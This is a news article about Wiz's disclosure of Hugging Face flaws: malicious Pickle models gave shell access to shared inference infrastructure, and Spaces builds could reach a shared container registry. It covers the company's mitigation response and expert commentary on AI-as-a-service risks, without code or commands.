Two critical security vulnerabilities in the Hugging Face AI platform opened the door to attackers looking to access and alter customer data and models.

One of the security weaknesses gave attackers a way to access machine learning (ML) models belonging to other customers on the Hugging Face platform, and the second allowed them to overwrite all images in a shared container registry. Both flaws, discovered by researchers at Wiz, had to do with the ability for attackers to take over parts of Hugging Face's inference infrastructure.

Wiz researchers found weaknesses in three specific components: Hugging Face's Inference API, which allows users to browse and interact with available models on the platform; Hugging Face Inference Endpoints — or dedicated infrastructure for deploying AI models into production; and Hugging Face Spaces, a hosting service for showcasing AI/ML applications or for working collaboratively on model development.

**The Problem With Pickle**

In examining Hugging Face's infrastructure and ways to weaponize the bugs they discovered, Wiz researchers found that anyone could easily upload an AI/ML model to the platform, including those based on the Pickle format. Pickle is a widely used module for storing Python objects in a file. Though even the Python software foundation itself has deemed Pickle as insecure, it remains popular because of its ease of use and the familiarity people have with it.

"It is relatively straightforward to craft a PyTorch (Pickle) model that will execute arbitrary code upon loading," according to Wiz.

Wiz researchers took advantage of the ability to upload a private Pickle-based model to Hugging Face that would run a reverse shell upon loading. They then interacted with it using the Inference API to achieve shell-like functionality, which the researchers used to explore their environment on Hugging Face's infrastructure.

That exercise quickly showed the researchers their model was running in a pod in a cluster on Amazon Elastic Kubernetes Service (EKS). From there the researchers were able to leverage common misconfigurations to extract information that allowed them to acquire the privileges required to view secrets that could have allowed them to access other tenants on the shared infrastructure.

With Hugging Face Spaces, Wiz found an attacker could execute arbitrary code during application build time that would let them examine network connections from their machine. Their review showed one connection to a shared container registry containing images belonging to other customers that they could have tampered with.

"In the wrong hands, the ability to write to the internal container registry could have significant implications for the platform's integrity and lead to supply chain attacks on customers’ spaces," Wiz said.

Hugging Face said it had completely mitigated the risks that Wiz had discovered. The company meanwhile identified the issues as at least partly having to do with its decision to continue allowing the use of Pickle files on the Hugging Face platform, despite the aforementioned well-documented security risks associated with such files.  

"Pickle files have been at the core of most of the research done by Wiz and other recent publications by security researchers about Hugging Face," the company noted. Allowing Pickle use on Hugging Face is "a burden on our engineering and security teams and we have put in significant effort to mitigate the risks while allowing the AI community to use tools they choose."

**Emerging Risks With AI-as-a-Service**

Wiz described its discovery as indicative of the risks that organizations need to be cognizant about when using shared infrastructure to host, run and develop new AI models and applications, which is becoming known as "AI-as-a-service." The company likened the risks and associated mitigations to those that organizations encounter in public cloud environments and recommended they apply the same mitigations in AI environments as well.

"Organizations should ensure that they have visibility and governance of the entire AI stack being used and carefully analyze all risks," Wiz said in a blog this week. This includes analyzing "usage of malicious models, exposure of training data, sensitive data in training, vulnerabilities in AI SDKs, exposure of AI services, and other toxic risk combinations that may exploited by attackers," the security vendor said.

Eric Schwake, director of cybersecurity strategy at Salt Security, says there are two major issues related to the use of AI-as-a-service that organizations need to be aware of. "First, threat actors can upload harmful AI models or exploit vulnerabilities in the inference stack to steal data or manipulate results," he says. "Second, malicious actors can try to compromise training data, leading to biased or inaccurate AI outputs, commonly known as data poisoning."

Identifying these issues can be challenging, especially with how complex AI models are becoming, he says. To help manage some of this risk it’s important for organizations to understand how their AI apps and models interact with API and find ways to secure that. "Organizations might also want to explore Explainable AI (XAI) to help make AI models more comprehensible," Schwake says, "and it could help identify and mitigate bias or risk within the AI models."

**About the Author(s)**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Tag

#auth